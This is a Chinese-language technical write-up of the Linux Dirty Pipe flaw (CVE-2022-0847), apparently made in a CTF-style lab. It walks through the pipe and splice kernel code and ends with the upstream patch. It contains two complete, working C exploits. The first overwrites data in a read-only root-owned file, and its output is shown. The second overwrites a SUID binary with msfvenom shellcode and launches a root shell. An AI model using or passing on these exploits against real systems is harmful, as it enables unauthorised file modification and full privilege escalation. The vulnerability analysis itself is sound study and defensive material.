下面使用 Linux 5.13.19 内核源码
pipe
pipe部分参考pipe结构体 重点:
- 写入操作申请新内存页时,通常会将 pipe_buffer->flags 初始化为 PIPE_BUF_FLAG_CAN_MERGE
- 向管道写入数据时,如果管道非空、上一个 pipe_buffer 未满,并且其带有 PIPE_BUF_FLAG_CAN_MERGE 标志,则会尝试直接向该 pipe_buffer 的页面追加写入数据
splice
文件与管道间数据拷贝
当想要将一个文件数据拷贝到另一个文件时,朴素的方法是打开文件后将源文件数据读入后再写入目标文件,这样需要在用户空间与内核空间来回进行数据拷贝,有较大开销

引入splice 零拷贝 只需要2次上下文切换
作用是在文件与管道之间进行数据拷贝,从而将内核空间与用户空间之间的数据拷贝转变为内核空间内的数据拷贝,避免数据在用户空间与内核空间之间的拷贝造成的开销

glibc中wrapper如下
#define _GNU_SOURCE /* See feature_test_macros(7) */ #include <fcntl.h> ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, size_t len, unsigned int flags);
本质上就是利用管道在内核空间中进行数据拷贝
如果要将数据从一个文件描述符拷贝到另一个文件描述符中,只需要先创建一个管道,使用splice系统调用将数据从源文件描述符拷贝到管道中、再用splice系统调用将数据从管道拷贝到目的文件描述符,从而只需要两次系统调用
splice 系统调用正式操作前都是一些基础的检查工作,这一块不深入分析,存在如下调用链:
SYS_splice()          // 检查文件描述符是否可用
    __do_splice()     // 若输入端或输出端是管道、却又为其指定了偏移量,则直接返回 -ESPIPE(管道不能指定偏移量)
        do_splice()   // 按输入/输出类型分流
最终文件与管道间的分流发生在 do_splice() 函数:
- 从管道读取到管道,调用 splice_pipe_to_pipe()
- 从文件读取到管道,调用 splice_file_to_pipe()
- 从管道读取到文件,调用 do_splice_from()
从文件读取到管道
核心原理:将pipe_buffer对应的page设置为文件映射的page
涉及下面调用链
splice_file_to_pipe() do_splice_to()
最终执行in->f_op->splice_read(in, ppos, pipe, len, flags);
调用内核文件结构体函数表的splice_read指针,对于不同文件系统该函数指针不同,ext4中函数指针对应ext4_file_operations,splice_read对应generic_file_splice_read
/*
 * File-operations table for ext4 files, quoted to show which handlers the
 * splice paths end up calling: reads into a pipe go through .splice_read,
 * writes from a pipe go through .splice_write.
 */
const struct file_operations ext4_file_operations = {
	.llseek = ext4_llseek,
	.read_iter = ext4_file_read_iter,
	.write_iter = ext4_file_write_iter,
	.iopoll = iomap_dio_iopoll,
	.unlocked_ioctl = ext4_ioctl,
#ifdef CONFIG_COMPAT
	.compat_ioctl = ext4_compat_ioctl,
#endif
	.mmap = ext4_file_mmap,
	.mmap_supported_flags = MAP_SYNC,
	.open = ext4_file_open,
	.release = ext4_release_file,
	.fsync = ext4_sync_file,
	.get_unmapped_area = thp_get_unmapped_area,
	/* file -> pipe: generic page-cache based splice read */
	.splice_read = generic_file_splice_read,
	/* pipe -> file: iterator based splice write */
	.splice_write = iter_file_splice_write,
	.fallocate = ext4_fallocate,
};
generic_file_splice_read()内部先调用iov_iter_pipe(),根据管道数据初始化iov_iter结构
/*
 * Initialise @i as a pipe-backed iterator over @pipe with @count bytes
 * remaining. Only direction == READ is accepted (BUG_ON otherwise), and a
 * warning is emitted if the pipe is already full.
 */
void iov_iter_pipe(struct iov_iter *i, unsigned int direction, struct pipe_inode_info *pipe, size_t count)
{
	BUG_ON(direction != READ);
	WARN_ON(pipe_full(pipe->head, pipe->tail, pipe->ring_size));
	i->type = ITER_PIPE | READ;
	i->pipe = pipe;
	/* start from the pipe's current head slot, at offset 0 */
	i->head = pipe->head;
	i->iov_offset = 0;
	i->count = count;
	/* record the slot the iterator started from */
	i->start_head = i->head;
}
EXPORT_SYMBOL(iov_iter_pipe);
接着调用call_read_iter()
/*
 * Thin dispatcher: forwards @kio and @iter to the read_iter handler found in
 * @file's operations table and returns whatever that handler returns.
 */
static inline ssize_t call_read_iter(struct file *file, struct kiocb *kio, struct iov_iter *iter)
{
	return file->f_op->read_iter(kio, iter);
}
所以最终又会调用ext4_file_read_iter
核心调用链如下,最终调用到copy_page_to_iter_pipe()
ext4_file_read_iter()
    generic_file_read_iter()
        filemap_read()
            filemap_get_pages()                 // 根据长度获取到文件对应映射的页面集
            copy_page_to_iter()                 // 进行页面拷贝(单位为单个页面),循环处理pvec数组(存放页面集)
                __copy_page_to_iter()
                    copy_page_to_iter_pipe()    // 我们是管道,所以走入该分支
注意参数,第一个参数page是文件对应映射的页面,最后一个参数i对应管道(iov_iter)
先取出当前pipe_buffer。如果迭代器当前偏移(i->iov_offset)不为0,并且该偏移与本次要拷贝的文件页内偏移相同、pipe_buffer的页面与文件页面也相同,则直接合并到当前pipe_buffer(只增加其len);否则无法合并,i_head自增1,取出下一个pipe_buffer
之后判断确保管道空间未满,按照文件页面设置pipe_buffer,get_page()增加页面引用计数,核心是buf->page = page;直接将该pipe_buffer页面设置为文件页面,从而利用管道映射文件数据
最后管道head自增1,更新管道iov_iter数据
注意到:这里对于读入数据偏移和长度的控制,是直接通过设置pipe_buffer的offset和len完成的,文件页面本身则是被直接映射(引用)到管道中的
上述操作存在的问题:缺少对pipe_buffer->flags重新赋值
/*
 * Attach @bytes bytes of @page, starting at @offset, to the pipe behind @i
 * without copying: the pipe slot is made to reference @page directly.
 *
 * Returns the number of bytes attached, or 0 when there is nothing to do,
 * the sanity check fails, or the pipe is full.
 *
 * NOTE: when a slot is (re)filled below, only ops, page, offset and len are
 * assigned; buf->flags is not written, so the slot keeps whatever flags value
 * it held before.
 */
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes, struct iov_iter *i)
{
	struct pipe_inode_info *pipe = i->pipe;
	struct pipe_buffer *buf;
	unsigned int p_tail = pipe->tail;
	unsigned int p_mask = pipe->ring_size - 1;
	unsigned int i_head = i->head;
	size_t off;

	/* never hand out more than the iterator still has room for */
	if (unlikely(bytes > i->count))
		bytes = i->count;

	if (unlikely(!bytes))
		return 0;

	if (!sanity(i))
		return 0;

	off = i->iov_offset;
	buf = &pipe->bufs[i_head & p_mask];
	if (off) {
		/* same page, contiguous offset: just extend the current slot */
		if (offset == off && buf->page == page) {
			/* merge with the last one */
			buf->len += bytes;
			i->iov_offset += bytes;
			goto out;
		}
		/* cannot merge: move on to the next slot */
		i_head++;
		buf = &pipe->bufs[i_head & p_mask];
	}
	if (pipe_full(i_head, p_tail, pipe->max_usage))
		return 0;

	/* point the slot at the caller's page and take a reference on it */
	buf->ops = &page_cache_pipe_buf_ops;
	get_page(page);
	buf->page = page;
	buf->offset = offset;
	buf->len = bytes;

	/* publish the slot and advance the iterator past the new data */
	pipe->head = i_head + 1;
	i->iov_offset = offset + bytes;
	i->head = i_head;
out:
	i->count -= bytes;
	return bytes;
}
从管道读取到文件
do_splice_from 最终会调用对应内核文件结构的函数表中的 splice_write() 指针,将 pipe_buffer 数组对应页面上内容读出,写入到文件中,对于不同的文件系统而言该函数指针不同
/*
 * Attempt to initiate a splice from pipe to file.
 *
 * Dispatches to the splice_write handler in @out's operations table and
 * returns its result; if the file provides no such handler, the result of
 * warn_unsupported() is returned instead.
 */
static long do_splice_from(struct pipe_inode_info *pipe, struct file *out, loff_t *ppos, size_t len, unsigned int flags)
{
	if (unlikely(!out->f_op->splice_write))
		return warn_unsupported(out, "write");
	return out->f_op->splice_write(pipe, out, ppos, len, flags);
}
ext4文件系统中,最终调用到iter_file_splice_write函数,之后存在如下调用链
iter_file_splice_write()
    splice_from_pipe_next()             // 检查管道可用性
    vfs_iter_write()                    // 读出管道数据写入文件
        do_iter_write()
            do_iter_readv_writev()
                call_write_iter()       // 传入type为write
漏洞分析
- 将管道整个读写一轮,此时所有 pipe_buffer 都保留了 PIPE_BUF_FLAG_CAN_MERGE 标志
- 利用 splice 将数据从文件读取一个字节到管道上,此时 pipe_buffer 对应的 page 指向文件映射的页面,而 splice 路径中没有清空 pipe_buffer 的标志位
- splice 建立完页面映射后,head 指向下一个 pipe_buffer。此时接着往管道写入数据,内核会发现上一个 pipe_buffer 还没有满(struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];)、且能够容纳要写入的数据长度、且其标志位为 PIPE_BUF_FLAG_CAN_MERGE,因此内核会认为该页面可以被写入,从而完成越权写入文件操作
漏洞利用
- 先把管道全部读写一遍,这样管道会初始化所有的 pipe_buffer,并为其设置标志位 PIPE_BUF_FLAG_CAN_MERGE
- 之后用 splice 系统调用将数据从目标文件读入管道,从而 pipe_buffer->page 变成文件在内存中映射的页面
- 将文件数据读入管道后,管道 head 指向下一个 pipe_buffer;继续写入数据时,内核会检查上一个 pipe_buffer,如果其剩余空间足够且标志位为 PIPE_BUF_FLAG_CAN_MERGE,则直接向上一个 pipe_buffer 的页面追加写入数据,从而越权写入文件
poc
/* * POC of CVE-2022-0847 * written by arttnba3 */ #define _GNU_SOURCE #include <unistd.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/stat.h> #include <sys/user.h> void errExit(char * msg) { printf("\033[31m\033[1m[x] Error : \033[0m%s\n", msg); exit(EXIT_FAILURE); } int main(int argc, char **argv, char **envp) { long page_size; size_t offset_in_file; size_t data_size; int target_file_fd; struct stat target_file_stat; int pipe_fd[2]; int pipe_size; char *buffer; int retval; // checking before we start to exploit if (argc < 4) { puts("[*] Usage: ./exp target_file offset_in_file data"); exit(EXIT_FAILURE); } page_size = sysconf(_SC_PAGE_SIZE); offset_in_file = strtoul(argv[2], NULL, 0); if (offset_in_file % page_size == 0) errExit("Cannot write on the boundary of a page!"); target_file_fd = open(argv[1], O_RDONLY); if (target_file_fd < 0) errExit("Failed to open the target file!"); if (fstat(target_file_fd, &target_file_stat)) errExit("Failed to get the info of the target file!"); if (offset_in_file > target_file_stat.st_size) errExit("Offset is not in the file!"); data_size = strlen(argv[3]); if ((offset_in_file + data_size) > target_file_stat.st_size) errExit("Cannot enlarge the file!"); if (((offset_in_file % page_size) + data_size) > page_size) errExit("Cannot write accross a page!"); // exploit now... puts("\033[34m\033[1m[*] Start exploiting...\033[0m"); /* * prepare the pipe, make every pipe_buffer a MERGE flag * Just write and read through */ puts("\033[34m\033[1m[*] Setting the PIPE_BUF_FLAG_CAN_MERGE for each buffer in pipe.\033[0m"); pipe(pipe_fd); pipe_size = fcntl(pipe_fd[1], F_GETPIPE_SZ); buffer = (char*) malloc(page_size); for (int size_left = pipe_size; size_left > 0; ) { int per_write = size_left > page_size ? page_size : size_left; size_left -= write(pipe_fd[1], buffer, per_write); } for (int size_left = pipe_size; size_left > 0; ) { int per_read = size_left > page_size ? 
page_size : size_left; size_left -= read(pipe_fd[0], buffer, per_read); } puts("\033[32m\033[1m[+] Flag setting has been done.\033[0m"); /* * Use the splice to make the pipe_buffer->page * become the page of the file mapped, by read * a byte from the file accross the splice */ puts("\033[34m\033[1m[*] Reading a byte from the file by splice.\033[0m"); offset_in_file--; // we read a byte, so offset should minus 1 retval = splice(target_file_fd, &offset_in_file, pipe_fd[1], NULL, 1, 0); if (retval < 0) errExit("splice failed!"); else if (retval == 0) errExit("short splice!"); puts("\033[32m\033[1m[+] File splice done.\033[0m"); /* * Now it comes to the time of exploit: * the mapped page of file has been in pipe_buffer, * and the PIPE_BUF_FLAG_CAN_MERGE is still set, * just a simple write can make the exploit. */ retval = write(pipe_fd[1], argv[3], data_size); if (retval < 0) errExit("Write failed!"); else if (retval < data_size) errExit("Short write!"); puts("\033[32m\033[1m[+] EXPLOIT DONE!\033[0m"); }
效果:
bash-5.2$ uname -a Linux (none) 5.13.19 #1 SMP Sun Jun 15 09:19:10 UTC 2025 x86_64 GNU/Linux bash-5.2$ ls -al /flag -rw-r--r-- 1 root root 11 Jun 15 09:29 /flag bash-5.2$ cat flag flag{1111} bash-5.2$ echo 1 >flag bash: flag: Permission denied bash-5.2$ /exp /flag 1 AAAA [*] Start exploiting... [*] Setting the PIPE_BUF_FLAG_CAN_MERGE for each buffer in pipe. [+] Flag setting has been done. [*] Reading a byte from the file by splice. [+] File splice done. [+] EXPLOIT DONE! bash-5.2$ cat /flag fAAAA1111}
提权
修改指定 suid 程序进行提权,使用 msfvenom 生成运行 /bin/sh 的 shellcode:
/* * exploit of CVE-2022-0847 * written by arttnba3 */ #define _GNU_SOURCE #include <unistd.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/stat.h> #include <sys/user.h> unsigned char shellcode[] = { 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x48, 0xb8, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x99, 0x50, 0x54, 0x5f, 0x52, 0x5e, 0x6a, 0x3b, 0x58, 0x0f, 0x05 }; unsigned int shellcode_len = 149; void errExit(char * msg) { printf("\033[31m\033[1m[x] Error : \033[0m%s\n", msg); exit(EXIT_FAILURE); } int main(int argc, char **argv, char **envp) { long page_size; size_t offset_in_file; size_t data_size; int target_file_fd; int pipe_fd[2]; int pipe_size; char *buffer; int retval; // checking before we start to exploit if (argc < 2) { puts("[*] Usage: ./exp target_file"); exit(EXIT_FAILURE); } page_size = sysconf(_SC_PAGE_SIZE); offset_in_file = 1; target_file_fd = open(argv[1], O_RDONLY); if (target_file_fd < 0) errExit("Failed to open the target file!"); // exploit now... 
puts("\033[34m\033[1m[*] Start exploiting...\033[0m"); /* * prepare the pipe, make every pipe_buffer a MERGE flag * Just write and read through */ puts("\033[34m\033[1m[*] Setting the PIPE_BUF_FLAG_CAN_MERGE for each buffer in pipe.\033[0m"); pipe(pipe_fd); pipe_size = fcntl(pipe_fd[1], F_GETPIPE_SZ); buffer = (char*) malloc(page_size); for (int size_left = pipe_size; size_left > 0; ) { int per_write = size_left > page_size ? page_size : size_left; size_left -= write(pipe_fd[1], buffer, per_write); } for (int size_left = pipe_size; size_left > 0; ) { int per_read = size_left > page_size ? page_size : size_left; size_left -= read(pipe_fd[0], buffer, per_read); } puts("\033[32m\033[1m[+] Flag setting has been done.\033[0m"); /* * Use the splice to make the pipe_buffer->page * become the page of the file mapped, by read * a byte from the file accross the splice */ puts("\033[34m\033[1m[*] Reading a byte from the file by splice.\033[0m"); offset_in_file--; // we read a byte, so offset should minus 1 retval = splice(target_file_fd, &offset_in_file, pipe_fd[1], NULL, 1, 0); if (retval < 0) errExit("splice failed!"); else if (retval == 0) errExit("short splice!"); puts("\033[32m\033[1m[+] File splice done.\033[0m"); /* * Now it comes to the time of exploit: * the mapped page of file has been in pipe_buffer, * and the PIPE_BUF_FLAG_CAN_MERGE is still set, * just a simple write can make the exploit. */ retval = write(pipe_fd[1], &shellcode[1], shellcode_len); if (retval < 0) errExit("Write failed!"); else if (retval < shellcode_len) errExit("Short write!"); puts("\033[32m\033[1m[+] EXPLOIT DONE!\033[0m"); puts("\033[34m\033[1m[*] Trigger root shell...\033[0m"); system(argv[1]); }
漏洞修复
修复方式是在初始化 pipe_buffer 时将其 flags 置 0:补丁在 copy_page_to_iter_pipe() 和 push_pipe() 两个函数中各添加了一行 buf->flags = 0;
push_pipe 函数用来将数据通过迭代器写入管道,先把对应 pipe_buffer 写满,如果还有没写完的,再循环分配新pipe_buffer直到写完数据或者管道已满或内存页分配失败
diff --git a/lib/iov_iter.c b/lib/iov_iter.c
index b0e0acdf96c1..6dd5330f7a99 100644
--- a/lib/iov_iter.c
+++ b/lib/iov_iter.c
@@ -414,6 +414,7 @@ static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t by
 		return 0;
 
 	buf->ops = &page_cache_pipe_buf_ops;
+	buf->flags = 0;
 	get_page(page);
 	buf->page = page;
 	buf->offset = offset;
@@ -577,6 +578,7 @@ static size_t push_pipe(struct iov_iter *i, size_t size,
 			break;
 
 		buf->ops = &default_pipe_buf_ops;
+		buf->flags = 0;
 		buf->page = page;
 		buf->offset = 0;
 		buf->len = min_t(ssize_t, left, PAGE_SIZE);